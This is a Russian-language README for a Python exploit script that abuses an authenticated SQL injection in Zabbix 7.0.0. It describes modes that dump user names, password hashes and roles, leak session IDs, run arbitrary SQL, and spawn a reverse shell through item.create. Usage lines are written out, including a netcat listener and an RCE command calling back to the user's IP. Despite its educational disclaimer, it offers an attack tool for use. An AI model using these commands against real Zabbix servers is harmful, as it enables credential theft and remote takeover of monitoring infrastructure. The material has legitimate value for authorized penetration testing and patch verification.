
Только для образовательных целей. Пожалуйста, не используйте против неавторизованных систем.
Скрипт на Python для эксплуатации авторизованной SQL-инъекции в Zabbix 7.0.0, поддерживающий несколько режимов работы: извлечение данных пользователей, утечка токенов сессий, удалённое выполнение команд (RCE) и выполнение произвольных SQL-запросов.
⚠️ ПРЕДУПРЕЖДЕНИЕ:
Данный скрипт предназначен только для образовательных и авторизованных пентестов.
Не используйте его на системах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.
requestsУстановите зависимости при необходимости:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [дополнительные аргументы...]
| Режим | Описание | Требуется admin token |
|---|---|---|
| leak-users | Извлекает все ID пользователей, имена, хеши паролей и роли | ❌ |
| leak-tokens | Извлекает все активные ID сессий из базы данных | ❌ |
| rce | Запускает reverse shell через эксплуатацию item.create | ✅ |
| custom | Выполнение любого произвольного SQL-запроса через инъекцию | ❌ |
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Основной скрипт эксплойта
README.md # Эта документация
Anthony (@874anthony)
Создано с любовью и любопытством 🐍
Этот проект выпущен под лицензией MIT. Пожалуйста, используйте ответственно.